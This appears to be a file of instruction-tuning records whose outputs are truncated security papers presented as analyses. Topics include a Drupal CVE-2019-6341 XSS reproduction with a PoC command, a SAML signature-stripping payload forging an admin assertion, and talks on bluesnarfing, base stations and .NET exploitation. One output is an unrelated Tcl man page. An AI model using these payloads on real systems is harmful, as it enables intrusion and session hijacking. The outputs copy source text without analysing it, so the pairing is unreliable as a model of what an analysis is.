{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Drupal XSS漏洞CVE-2019-6341 * 影响软件Drupal * 方式通过文件模块或者子系统上传恶意文件触发XSS漏洞 * 参考链接[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) * 效果JS代码执行Cookies 资料窃取会话劫持钓鱼欺骗网页挂马等 ## 漏洞环境 执行如下命令启动drupal 8.5.0的环境 ```bash docker compose up -d ``` 环境启动后访问 `http://your-ip:8080/` 将会看到drupal的安装页面一路默认配置下一步安装因为没有mysql环境所以安装的时候可以选择sqlite数据库 ## 漏洞复现 该漏洞需要利用drupal文件模块上传文件的漏洞伪造一个图片文件上传文件的内容实际是一段HTML代码内嵌JS这样其他用户在访问这个链接时就可能触发XSS漏洞 Drupal 的图片默认存储位置为 `/sites/default/files/pictures/<YYYY-MM>/`默认存储名称为其原来的名称所以之后在利用漏洞时可以知道上传后的图片的具体位置 使用PoC上传构造好的伪造GIF文件PoC参考[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)的PoC 如图输入如下命令即可使用PoC构造样本并完成上传功能第一个参数为目标IP 第二个参数为目标端口 ```bash php cve-2019-6341-exp.php 192.168.11.1 8080 ``` ![1](1.png) 上传成功后访问图片位置即可触发 XSS 漏洞如下图所示 Tips: 1. 因为 Chrome 和 FireFox 浏览器自带部分过滤 XSS 功能所以验证存在时可使用 Edge 浏览器或者 IE 浏览器 2. 访问的图片名称为_0的原因是因为 Drupal 的规则机制具体原理见[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) ![2](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHackerspaces: The Legal Bases nicolle neulist (rogueclown) DEFCON 17 August 2, 2009 a little about me  attorney in Illinois  founding member of Pumping Station: One in Chicago  attorney for Pumping Station: One topics for this talk  making your hackerspace a real legal entity  special considerations for nonprofit hackerspaces  looking for a physical space  liability concerns for when you're up and hacking disclaimer...or, what this talk isn't  This talk is for informational purposes, and is not personal legal advice. It does not create an attorney-client relationship between me and any of you who are listening to it.  Even though I have made every effort to make the content as accurate as possible, there is no way I can address all the legal issues that may ever come up.  Also, the way to best address each issue often varies by state or jurisdiction. I am only licensed in Illinois. what this talk is  introduce you to the most common issues that arise when starting hackerspaces  introduce you to common ways states treat them  equip you to ask the right questions as you start and plan your hackerspace. corporate formation making your hackerspace a real, live legal entity why incorporate?  not incorporating may be tempting  paperwork  giving in to the man  however, incorporating protects you!  personal vs. organizational liability corporate and corporate-like forms  nonprofit corporation  not for profit  does not issue stock, and cannot pay dividends  all money must be reinvested into nonprofit purpose  subject to state laws governing director, officer, and member meetings  donations may be eligible for tax deductions corporate and corporate-like forms  traditional corporation  for-profit entity  issues shares of stock, and may pay dividends on those shares  subject to state laws governing director, officer, and shareholder meetings  entity is taxed, as well as shareholders' profits corporate and corporate-like forms  limited liability company  for-profit entity  hybri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# USB ## 简介 **USB详述**: [https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf](https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf) - 鼠标协议 鼠标移动时表现为连续性与键盘击键的离散性不一样不过实际上鼠标动作所产生的数据包也是离散的毕竟计算机表现的连续性信息都是由大量离散信息构成的 每一个数据包的数据区有四个字节第一个字节代表按键当取0x00时代表没有按键为0x01时代表按左键为0x02时代表当前按键为右键第二个字节可以看成是一个signed byte类型其最高位为符号位当这个值为正时代表鼠标水平右移多少像素为负时代表水平左移多少像素第三个字节与第二字节类似代表垂直上下移动的偏移 得到这些点的信息后,即可恢复出鼠标移动轨迹 - Tools - [UsbMiceDataHacker](https://github.com/WangYihang/UsbMiceDataHacker) - 键盘协议 键盘数据包的数据长度为8个字节击键信息集中在第3个字节 根据data值与具体键位的对应关系 可从数据包恢复出键盘的案件信息 - Tools - [UsbKeyboardDataHacker](https://github.com/WangYihang/UsbKeyboardDataHacker) **参考** - https://www.anquanke.com/post/id/85218 ## 例题 > `Xman`三期夏令营排位赛练习题`AutoKey` > > WPhttps://www.cnblogs.com/ECJTUACM-873284962/p/9473808.html 问题描述 这道题是我参加 `Xman` 三期夏令营选拔赛出的一道题我们如何对其进行分析 ### 流量包是如何捕获的 首先我们从上面的数据包分析可以知道这是个 `USB` 的流量包我们可以先尝试分析一下 `USB` 的数据包是如何捕获的 在开始前我们先介绍一些 `USB` 的基础知识 `USB` 有不同的规格以下是使用 `USB` 的三种方式 ```shell l USB UART l USB HID l USB Memory ``` `UART` 或者 `Universal Asynchronous Receiver/Transmitter` 这种方式下设备只是简单的将 `USB` 用于接受和发射数据除此之外就再没有其他通讯功能了 `HID` 是人性化的接口这一类通讯适用于交互式有这种功能的设备有键盘鼠标游戏手柄和数字显示设备 最后是 `USB Memory` 或者说是数据存储 `External HDD`  `thumb drive/flash drive` 等都是这一类的 其中使用的最广的不是 `USB HID` 就是 `USB Memory` 了 每一个 `USB` 设备尤其是 `HID` 或者 `Memory` 都有一个供应商 `IDVendor ID` 和产品识别码`Product Id`  `Vendor ID` 是用来标记哪个厂商生产了这个 `USB` 设备 `Product ID` 用来标记不同的产品他并不是一个特殊的数字当然最好不同如下图 上图是我在虚拟机环境下连接在我电脑上的 `USB` 设备列表通过 `lsusb` 查看命令 例如说我在 `VMware` 下有一个无线鼠标它是属于 `HID` 设备这个设备正常的运行并且通过`lsusb` 这个命令查看所有 `USB` 设备现在大家能找出哪一条是这个鼠标吗没有错就是第四个就是下面这条 ```shell Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse ``` 其中`ID 0e0f:0003` 就是 `Vendor-Product ID` 对 `Vendor ID` 的值是 `0e0f` 并且 `Product ID` 的值是 `0003`  `Bus 002 Device 002` 代表 `usb` 设备正常连接这点需要记下来 我们用 `root` 权限运行 `Wireshark` 捕获 `USB` 数据流但是通常来说我们不建议这么做我们需要给用户足够的权限来获取 `Linux` 中的 `usb` 数据流我们可以用 `udev` 来达到我们的目的我们需要创建一个用户组 `usbmon` 然后把我们的账户添加到这个组中 ```shell addgroup usbmon gpasswd -a $USER usbmon echo 'SUBSYSTEM=", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH ProgressBar 3tk \"tcllib - BWidget\" .SH NAME .B ProgressBar - 进度指示器组件 .SH 创建 CREATION .B ProgressBar pathName ?option value...? .SH 描述 DESCRIPTION ProgressBar 组件向用户指示一个冗长的操作的进度它通常用于 MainFrame 和 ProgressDlg .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -height 为进度指示器指定想要的高度 .TP -maximum 指定变量的最大值 .TP -type 指定 ProgressBar 的类型必须是 normalincremental 或 infinite 之一 如果 type 是 normal则在每次设置变量的时候按变量值和 maximum 选项来成比例的绘制进度指示器 如果 type 是 incremental则在内部维护进度指示器的值并在每次设置变量值的时候增加内部值按内部值和 maximum 选项来成比例的绘制进度指示器 如果 type 是 infinite 则在内部维护进度指示器的值并在每次设置变量值的时候增加内部值 如果内部值(以 maximum 为模)小于 maximum/2 则进度指示器从左至右增长并且如果内部值大于 maximum/2 则从右至左增长 它的值的特殊情况请参见 -variable 选项 .TP -variable 指定联系(attach)到进度指示器上的变量在这个变量的值变化的时候更新进度指示器如果这个变量的值是负数则不显示进度指示器(用 background 色绘平(draw flat)它 - 用于 ProgressDlg 使它不可见)如果它的值是 0则重新初始化进度指示器 .TP -width 为进度指示器指定想要的宽度 .SH 组件命令 .TP pathName cget option 返回用 option 给出的配置选项的当前值Option 可以是能被建立命令接受的任何值 .TP pathName configure ?option? ?value option value ...? 查询或修改这个组件的配置选项如果未指定 option 则返回描述 pathName 的所有可获得的选项的一个列表如果指定了不带 value 的 option则这个命令返回描述这个指名的 option 的一个列表(这个列表与未指定 option 所返回的值的相应的子集是一样的)如果指定了一个或多个选项-值 对则这个命令把给定的组件选项修改为给定的值在这种情况下这个命令返回一个空串Option 可以是能被建立命令接受的任何值只读选项不可修改 .SH \"[中文版维护人]\" .B 寒蝉退士 .SH \"[中文版最新更新]\" .B 2001/05/12 .SH \"中国 Linux 论坛 man 手册页翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRADIO EXPLOITATION 101 MATT KNIGHT // MARC NEWLIN // BASTILLE NETWORKS CHARACTERIZING//CONTEXTUALIZING//CLASSIFYING RF ATTACKS RADIO EXPLOITATION 101 // BASTILLE NETWORKS WHO ARE THESE GUYS  Matt Knight  Software Engineer and Security Researcher @  Reverse engineered the LoRa wireless protocol in 2016  BE & BA from Dartmouth  Marc Newlin  Security Researcher @  Discovered Mousejack vulnerability in 2016  Finished 3rd in DARPA Spectrum Challenge in 2012  Finished 2nd in DARPA Shredder Challenge in 2010 matt@ .net @embeddedsec marc@ .net @marcnewlin WIRELESS EXPLOITATION METHODS WIRELESS VS. WIRED DO IT LIVE (DEMO) RADIO EXPLOITATION 101 // BASTILLE NETWORKS AGENDA 1. Evolution wired and wireless network attacks 2. RF technical overview 3. Methods of Wireless Exploitation  Techniques, impact, and defenses  Analogues to wired networks  Examples and demos (do it live!) 4. How to apply this information EVOLUTION OF NETWORK SECURITY HISTORICAL BACKGROUND // CONTEXT https://frostedpress.files.wordpress.com/2016/09/4286297.png 1990s Packet sniffing in the http://s202976374.onlinehome.us/ebay/test_equip/analyzers/Dolch_PAC_64_05.jpg NETWORK GENERAL PACKET SNIFFER $8,000+ (in 1990s dollars) Installed on a Dolch lunchbox computer 1998 Packet sniffing in ETHEREAL // WIRESHARK $0 https://blog.wireshark.org/wp-content/uploads/2013/10/ethereal-0.2.0.png 2000s Wireless* sniffing in the *non-802.11 EARLY SDRS >>$100K 2012 Wireless sniffing in RTL 2832 USB STICK $8 (not pictured: promiscuous mode driver) 2017 Wireless sniffing in ALL THE SDRS $8 -> $1150 https://www.nuand.com/blog/wp-content/uploads/2013/05/DSC0063.png https://www.ettus.com/product/details/UB210-KIT https://cdn.sparkfun.com//assets/parts/9/9/5/3/13001-04.jpg https://cdn.itead.cc/media/catalog/product/i/m/im141027001_5__1.jpg http://www.nooelec.com/store/media/catalog/product/cache/1/image/1200x/040ec09b1e35df139433887a97daa66f/n/e/nesdr_mini_1b.jpg https://www.ettus.com/content/images/USRP_B200mini_Front_Diagonal_Large.png", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x0000 i'm learning a lesson called patience. can't wait 'til i have it all learned. - walk on water fun with symboliks symbolik analysis in pure python 0x0001  who am i?  Jesus dude  husband  father  hobby farmer  biker 0x0002  who am i?  oh, and i'm atlas 0f d00m  re  vr  hw  fw  radio  cars/meddevs/SmartMeters/embedded  Vivisect/envi/symboliks  atlas@r4780y.com 0x0100  symboliks - wtfo?  part of Vivisect, invisigoth's binary analysis framework  Symbolic Analysis  based on threads of execution  Symbolic Emulation  granular control of symbolic analysis  pure python 0x0200  intro to Vivisect  binary analysis framework  pure python  vdb debugger  emulators  gooey  symboliks  extensible  scalpals  interactive python  scripting  client/server model collaboration  peer-to-peer model collaboration 0x0201  intro to Vivisect  binary analysis framework  pure python  vdb programmatic debugger  emulators  gooey  symboliks  extensible  scalpals  interactive python  scripting  client/server model collaboration  peer-to-peer model collaboration 0x0210  intro to Vivisect (2)  analyzing and viewing workspace $ vivbin -B stage3 Failed to find file for 0x0804a1a4 (__bss_start) (and filelocal == True!) Failed to find file for 0x0804a1a4 (_edata) (and filelocal == True!) Loaded (0.0296 sec) stage3 ANALYSIS TIME: 0.277778863907 stats: {'functions': 67, 'relocations': 0} Saving workspace: stage3.viv $ vivbin stage3.viv 0x0220  viv/stage3 do you see the vuln? 0x0230  viv/stage3 vuln  look again... 0x0210  intro to Vivisect (2)  pure python $ ipython In [1]: import vivisect.cli as vivcli In [2]: vw = vivcli.VivCli() In [3]: vw.loadFromFile('stage3') Failed to find file for 0x0804a1a4 (__bss_start) (and filelocal == True!) Failed to find file for 0x0804a1a4 (_edata) (and filelocal == True!) Out[3]: 'stage3' In [4]: vw.analyze() In [5]: vw.saveWorkspace() 0x0300  intro to Symboliks  ENVI disassembler, emulator, symboliks  drag 'symbolic info' through emulation of each opcode  at each point,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n这本来只是是我写的具个插件 后那个具bug太多就没有维护了有个需求就把这个插件摘出来改 了下 需求是拿到域内控制器的权限但是要定位域内户的ip找了市上的具基本都是扔到域控上去执在域控 上执难免会再产额外的志如果脱志回来的话部分程序都不允许指定志件所以写了这个简单的 具脱志回来本地解析志如果本地解析的话LogParser先参数太复杂并且移植性相较差并且这个 插件还可以根据的需求环境进简单的改动 主要功能是解析evtx件调的evtx的模块编写的原有的evtx模块使起来较为麻烦于是编写了那么个 具般使场景如 拿到预控时读取域内主机对应的ip应急时获取标志信息查询3389对外登陆志等  由于是读件解析后再循环获取志id志件过时可能会慢点所以需要稍微等待会之前的需求是默 认读取的4624志可以根据需求改动可以将对的志件脱回到本地或者是放在服务器上运在服 务器运会默认读取 C:\\Windows\\System32\\winevt\\Logs\\Security.evtx 使法: main.exe Security.evtx 注意 如果在win32 环境编译法在64位环境下运 会提示没有此件 参考https://github.com/0xrawsec/golang-evtx", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBluesnarfing @ CeBIT 2004 Detecting and Attacking bluetooth-enabled Cellphones at the Hannover Fairground Dipl.-Ing.(FH) Martin Herfurt Salzburg Research Forschungsgesellschaft mbH, Austria martin.herfurt@salzburgresearch.at March 30, 2004 Abstract A big shock went through the community when it became public, that some bluetooth-enabled handsets are disclosing personal information. The informa- tion posted on [1] introduces three basic ways to attack bluetooth-enabled de- vices. This report briefly describes the SNARF exploit for the recently discov- ered bluetooth security loophole that is not requiring any kind of preparation or prior manipulation of the devices. 1 Introduction SNARF and bluesnarfing are words that have been spooking through the Internet during the last months. These words relate to a recently discovered security flaw in bluetooth-enabled devices. This report is about a field-trial that has evaluated this security loophole at the CeBIT 2004 in Hannover. 1.1 Bluetooth Security Issues End of November 2003 Adam and Ben Laurie (A.L. Digital Ltd.) published a doc- ument [1] on the Internet stating that some bluetooth-enabled phones are having serious security flaws. These flaws allow attackers to connect to the device without permission (no pairing) and carry out a so-called SNARF attack. In the beginning of February 2004, the fact that some bluetooth-enabled handsets are having security issues made it into many news-tickers around the globe. Most of the news-sites pretended that exploit-tools were available in the Internet. But even extensive research in the Internet did not bring up the location where these 1 tools were available. As described in [1], the SNARF attack enables access to restricted portions of the device. SNARF is a word coming from computer-hacker jargon. To snarf something means to grab a large document or file and use it without the authors permission[2]. So it is possible to, for example read out the affected devices phone books. These pho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploitation Of Windows .NET Framework Nanika nanika_pan@trend.com.tw 1 I am Nanika 2  APT ?  No Exploit in .NET?  Only EXE Attack?  always Finds the New Attack TREND  趨勢始終來自於弱點 .NET Framework 3 .Net framework Security Improvements 4 .NET Architecture 5 WPF  Windows Presentation Foundation (WPF) browser-hosted applications  Default Enable DEP Security Zone Behavior Getting Full Trust Local computer Automatic full trust No action is needed. Intranet and trusted sites Prompt for full trust Sign the XBAP with a certificate so that the user sees the source in the prompt. Internet Fails with \"Trust Not Granted\" Sign the XBAP with a certificate. 6 Trust Site 7 Debug WPF  To configure Microsoft Visual Studio 2005 to debug an XBAP that calls a Web service:  With a project selected in Solution Explorer, on the Project menu, click Properties.  In the Project Designer, click the Debug tab.  In the Start Action section, select Start external program and enter the following:  C:\\WINDOWS\\System32\\PresentationHost.exe  In the Start Options section, enter the following into the Command line arguments text box:  -debug filename  The filename value for the -debug parameter is the .xbap filename; for example:  -debug c:\\example.xbap 8 ClickOnce Deployment Task ClickOnce Windows Installer Install Files X X Create Shortcuts X X Associate File Extensions X X Install Services X Install to GAC X Manage ODBC X Manage COM+ X Write to Registry X Advertising X Self-Repair X File/Folder/Registry Permissions X 9 ClickOnce INTERNET or Full Trust 10 Examples of permissions not available in the Internet zone FileIOPermission This permission controls the ability to read and write files on disk. Consequently, applications in the Internet zone cannot read files on the user's hard disk. RegistryPermission This permission controls the ability to read/write to the registry. Consequently, applications in the Internet zone cannot access or control state in the user's registry. SecurityPermission.UnmanagedC", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyberpeace Whitepaper Is WebAssembly Really Safe? - Wasm VM Escape and RCE Vulnerabilities Have Been Found in New Way July 19, 2022  Version 1.0 Prepared by Zhao Hai(@h1zhao) Zhichen Wang Mengchen Yu Lei Li Abstract WebAssembly(Wasm) supports binary format which provides languages such as C/C++, C# and Rust with a compilation target on the web. It is a web standard with active participation from all major browser vendors (chrome, edge, Firefox, safari). Also, Wasm runtime can be widely used for edge computing. Previous research on Wasm security mostly focuses on exploitation at the compiler and linker level, but few people focus on Wasm VM escape. Therefore, we design a new fuzz framework based on Wasm standard to explore the runtime vulnerability itself. The framework can be compatible with all programs or projects containing Wasm design standards. If there is an escape vulnerability in the browser kernel or any project that uses Wasm runtime, when an attacker deploys a page or service containing a malicious Wasm binary, he can control the access device or the server that provides the runtime service. We find that these escape vulnerabilities are usually caused by inadequate operand boundary checking of bytecode interpreter or stack overflow of WASI API. For example, in wasm3 and WasmEdge projects, we use the above two methods to achieve VM escape. Meanwhile, there are many exploitable vulnerabilities in the parsing of file data structure, which are usually overflow vulnerabilities caused by inadequate inspection of some input fields. Normally, these vulnerabilities will lead to denial of service attacks. In the process of fuzzing, we find that almost all wasm runtime projects can exploit such vulnerabilities Finally, we will show the off-by-one vulnerability of a PC stack of WasmEdge that we discovered, which successfully conducts RCE on the host. This process is very ingenious and we will explain it in detail at the demo time. 天虞实 验室 TianYu Table of Contents 天虞实验", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLost and Found Certificates Ian Foster & Dylan Ayrey Who We Are Ian Information Security Engineer CertGraph https://dns.coffee https://lanrat.com https://github.com/lanrat @LANRAT Dylan truffleHog WPA2-HalfHandshake-Crack Pastejacking Other stuff https://github.com/dxa4481 dylanayrey@gmail.com The Problem A certificate can outlive a the ownership of a domain This potentially leaves the domain owner with a valid SSL certificate for the next owner How can you know?  Buy a new domain hope for the best?  In the early 2000s and early 2010s, youd never know Alice registers foo.com for 1 year Bob registers foo.com Alices 3 year SSL certificate for foo.com foo.com unregistered Bobs certificate for foo.com Certificate Transparency!  Log of all certificates issued by public Certificate Authorities  Designed to catch bad or misbehaving Certificate Authorities  Publicly auditable and searchable  ½ billion certs and growing We Can find pre-existing certificates  Note the purchase date of said domain  Search CT logs for certs pre-dating that date and valid after  Monitor  Old certs may not show up in logs for years, if ever A significant example stripe.com How big is this issue? Searched Certificate Transparency (CT) for certificates that overlap multiple domain registrations Data  3 million domains  1% of internet  Looked for changes...  Expiration date  Email contacts  Registrar  Etc... Sources  CT logs  Historical WHOIS  Historical nameservers https://dns.coffee  WayBack Machine https://archive.org 1.5M (0.45%) Of domains tested have pre-existing certificates 25% haven't expired yet BygoneSSL noun An SSL certificate created before and supersedes its domains current registration date Could it be worse?  Certificates can have many domains  Certificates can contain some bygone domains and some not Cert foo.com bar.com foo.com <bygone> bar.com CertGraph Example of BygoneSSL https://github.com/lanrat/certgraph Example: do.com Can we revoke these certs? If no.  Spend 10k on a domain", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGoodbye Memory Scraping Malware Hold Out Till \"Chip And Pin. Weston Hecker Security Expert With KLJ Systems Network Analyst/Penetrations Tester/President Of Computer Security Association Of North Dakota #westonhecker #skimbadsoftware Who Am I What Do I Do What's the Talk About,  About Me: Speaker at Defcon 22 Tons of Computer Certs, Computer Science/Geophysics  About 11 years pen-testing, security research , Spoke at Defcon 22 Las Vegas on Burnerphone DDOS  NERC, FFIEC, FISMA/NIST, ISO, GLBA and FDIC, Compliance audits HIPAA, Omnibus,  Wrote custom exploits for obscure Internet service provider gear and PMS software.  Tools of the trade Fleet of Fake I phones And now android variance.  Co-writer of Skimbad Software Open source anti malware skimming software OPEN SOURCE. This talk today will be going of this new concept of protecting Data  Pentesting for a living everything from banks, hospitals and ISP in the Mid-west. I live and work in North Dakota  Security projects including Reverse engineering of malware and tracking software. Working on 911 Attack mitigation projects. TEENSY 3.1 Container!!! Build Your Own There Awesome !!! Hit me up on Twitter or E-mail me. START THE DEMO !!!  This will Run while I speak  We will check the number at the end of the Presentation  The Graphical demonstration version is available on Skimbad.com  Source Code and EXE are Available on GitHub The problem of Data skimming malware/ Large Profile cases Why do people skim data / how much does it cost Why do people skim data / how much does it cost how its sold/used to defraud how its sold/used to defraud  Carding/ Ordering things online  Duplicating cards and using them in stores.  ATM Cashout runs / Pin Skimmed Data.  Theft of resources / Gas Food.  Theft of online services or Licenced materials / Digital Movies /subscriptions to sites.  Using Card data to transfer money WU runs. How batches of data are ex-filtrated and sold How batches of data are ex-filtrated and sold  USB devices use", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njava反序列化基础知识总结 java的类加载过程 1. 首先是调用 public Class<?> loadClass(String name) 方法通过public方法调用保护方法 protected Class<?> loadClass(String name, boolean resolve) 2. 在 protected loadClass 方法中第400行会调用一个 findLoadedClass 方法判断当前类是否已 经加载如果类已经加载直接返回当前类的类对象 3. 如果创建当前 ClassLoader 时传入了父类加载器( new ClassLoader (父类加载器))就使用父类加载 器加载 TestHelloWorld 类否则使用 JVM 的 Bootstrap ClassLoader 加载 4. 如果通过类加载器没有办法加载类则会通过 findClass 方法尝试加载类 5. 如果当前的 ClassLoader 没有重写 findClass 方法则会直接返回类不存在跟进 findClass 方 法进行查看如果当前类重写了 findClass 方法并通过传入的类名找到了对应的类字节码那么 应该调用 defineClass 方法去 JVM 中注册该类 6. 如果调用 loadClass 的时候传入的 resolve 参数为true那么还需要调用 resolveClass 方法链 接类,默认为false 7. 返回一个JVM加载后的java.lang.Class类对象 8. 通过重写 ClassLoader#findClass 方法实现自定义类的加载. package ClassLoader_; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.lang.reflect.Method; import java.util.Arrays; public class selfClassload_ extends ClassLoader{ public static String className=\"ClassLoader_.HelloWorld\"; public static byte[] fileByte; public static void main(String[] args) throws Exception { FileInputStream fis=new FileInputStream(\"D:\\\\Java\\\\project\\\\study\\\\serializeSummary\\\\src\\\\HelloWorld.cla ss\"); fileByte=fileToByte(fis); System.out.println(Arrays.toString(fileByte)); selfClassload_ classload = new selfClassload_(); Class<?> aClass = classload.loadClass(className); Object helloWorld = aClass.newInstance(); Method hello = helloWorld.getClass().getMethod(\"hello\"); System.out.println((String)hello.invoke(helloWorld)); } @Override protected Class<?> findClass(String name) throws ClassNotFoundException { if (name.equals(className)){ return defineClass(className,fileByte,0,fileByte.length); } return super.findClass(name); } public static byte[] fileToByte(FileInputStream fis) throws Exception{ // 将.class文件转成二进制编码 byte[] buffer=null; Class类 1. 上面讲到通过 loadClass 方法加载之后得到是一个 java.lang.Class类对象 关于这个 Class 类 对象需要简单说明一下在java中存在一个 Class 类作用是当类加载完成之后将类的各种属性 方法进行封装成单独的对象 2. Source阶段Person.class表示Person.java的字节码文件在Class类对象阶", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Attacking BaseStations Hendrik Schmidt <hschmidt@ernw.de> Brian Butterly <bbutterly@ernw.de> 2 Who we are o Old-school network geeks, working as security researchers for o Germany based ERNW GmbH o Independent o Deep technical knowledge o Structured (assessment) approach o Business reasonable recommendations o We understand corporate o Blog: www.insinuator.net o Conference: www.troopers.de 3 Motivation o The 4G standard introduces a lot of new technologies providing modern services to the customer. o This includes features as VoLTE, SON, ..Trust and optional controls o BaseStations are the big (and small) antennas in the field o With our research we want to bring visibility to o How the environment works o What providers do o What vendors do 4 Introduction From 2G to 4G Telecommunication Networks 5 4G Core eUTRAN UE eNodeB MME PDN-GW Serv-GW HSS IMS S1-MME S1-U OSS S1-MME IP Network 6 Typical Environment? Source: worldlte.blogspot.com 7 Typical Environment? 8 BaseStation Physical Setup o Usually a closed/outdoor rack o Baseband Unit (BBU) (or multiple) o Power Distribution Unit (PDU) o Power Supply Unit (PSU) o Ventialation o Temperatur/ Humidity Sensors o Alarm Sensors o Extra box with power connections 9 The Idea 1. Understand BaseStation Setup 2. Purchase an old BaseStation out of the field 3. Get BS running in an emulated environment 4. Perform an evaluation of configuration & security 10 What we need: Basestation Physical Setup o Base Band Unit (BBU) o Usually standing on the ground o Remote Radio Head/Unit (RRH/RRU) o May be placed on the cell mast or on the ground o Antenna o Come in various shapes and sizes o Nowadays often vector antennas o All active parts are interconnected o BBU, RRU, sensors, power supply, vents 11 o Components run on -48V o Not +-48V (96V differential) o Basically just 48V connected the other way round o Basically receives raw RF signals via Fiber and sends them out via Copper o Towards the antenna o Usually capable of serving a spec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n今天看到一篇文章: https://bitsadm.in/blog/windows-security-updates-for-hackers 讲述如何通过Windows的补丁号来评估系统面临的风险以及工具的相关实现它通过爬取微软官方更新 中的KB号和系统已有的进行对比和hacking8的提权辅助 https://i.hacking8.com/tiquan 有一点异曲 同工之妙 它发布的工具是: https://github.com/bitsadmin/wesng 我摘出一些觉得有用的代码出来 识别系统版本 通过systeminfo得知我的系统版本是 19042 可得出我的系统版本是 20H2 Windows版本号过去发布的格式是YYMMYY为年MM为月例如2020年4月发布的即是 2004系统内部代号即是19041 从2020年Windows10秋季发布开始变成了YYH1/YYH2半年模式 识别系统版本号在后面可以用来筛选安全更新减少误报率 根据systeminfo信息确认系统版本 主要就是通过正则python代码如下 # 构建号和版本之间的映射表以正确识别 # systeminfo输出中指定的Windows 10/11/Server 2016/2019/2022版本 buildnumbers = OrderedDict([ (10240, 1507), (10586, 1511), (14393, 1607), (15063, 1703), (16299, 1709), (17134, 1803), (17763, 1809), (18362, 1903), (18363, 1909), (19041, 2004), (19042, '20H2'), (19043, '21H1'), (22000, '21H2') # Windows 11 ]) # Determine Windows version based on the systeminfo input file provided def determine_product(systeminfo): systeminfo = charset_convert(systeminfo) # Fixup for 7_sp1_x64_enterprise_fr_systeminfo_powershell.txt systeminfo = systeminfo.replace('\\xA0', '\\x20') # OS Version regex_version = re.compile(r'.*?((\\d+\\.?){3}) ((Service Pack (\\d)|N\\/\\w|.+) )?[ -\\xa5]+ (\\d+).*', re.MULTILINE | re.IGNORECASE) systeminfo_matches = regex_version.findall(systeminfo) if len(systeminfo_matches) == 0: raise WesException('Not able to detect OS version based on provided input file\\n In case you used the missingpatches script, use: wes.py -m missing.txt') systeminfo_matches = systeminfo_matches[0] mybuild = int(systeminfo_matches[5]) servicepack = systeminfo_matches[4] # OS Name win_matches = re.findall('.*?Microsoft[\\(R\\)]{0,3} Windows[\\(R\\)?]{0,3} ? (Serverr? )?(\\d+\\.?\\d?( R2)?|XP|VistaT).*', systeminfo, re.MULTILINE | re.IGNORECASE) if len(win_matches) == 0: raise WesException('Not able to detect OS name based on provided input file') win = win_matches[0][1] # System Type archs = re.findall('.*?([\\w\\d]+?)-based PC.*', systeminfo, re.MULTILINE | re.IGNORECASE) if len(archs) > 0: arch = archs[0] else: logging.warni", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SAML Injection > Security Assertion Markup Language (SAML) is an open standard that allows security credentials to be shared by multiple computers across a network. When using SAML-based Single Sign-On (SSO), three distinct parties are involved. There is a user (the so-called principal), an IDentity Provider (IDP), and a cloud application Service Provider (SP). - centrify ## Summary * [Tools](#tools) * [Authentication Bypass](#authentication-bypass) * [Invalid Signature](#invalid-signature) * [Signature Stripping](#signature-stripping) * [XML Signature Wrapping Attacks](#xml-signature-wrapping-attacks) * [XML Comment Handling](#xml-comment-handling) * [XML External Entity](#xml-external-entity) * [Extensible Stylesheet Language Transformation](#extensible-stylesheet-language-transformation) ## Tools - [SAML Raider - Burp Extension](https://github.com/SAMLRaider/SAMLRaider) - [SAML Support - ZAP Addon](https://www.zaproxy.org/docs/desktop/addons/saml-support/) ## Authentication Bypass A SAML Response should contain the `<samlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\"`. ### Invalid Signature Signatures which are not signed by a real CA are prone to cloning. Ensure the signature is signed by a real CA. If the certificate is self-signed, you may be able to clone the certificate or create your own self-signed certificate to replace it. ### Signature Stripping > [...]accepting unsigned SAML assertions is accepting a username without checking the password - @ilektrojohn The goal is to forge a well formed SAML Assertion without signing it. For some default configurations if the signature section is omitted from a SAML response, then no signature verification is performed. Example of SAML assertion where `NameID=admin` without signature. ```xml <?xml version=\"1.0\" encoding=\"UTF-8\"?> <saml2p:Response xmlns:saml2p=\"urn:oasis:names:tc:SAML:2.0:protocol\" Destination=\"http://localhost:7001/saml2/sp/acs/post\" ID=\"id39453084082248801717742013\" IssueInstant=\"201", "category": "text_analysis", "source": "security_papers"}
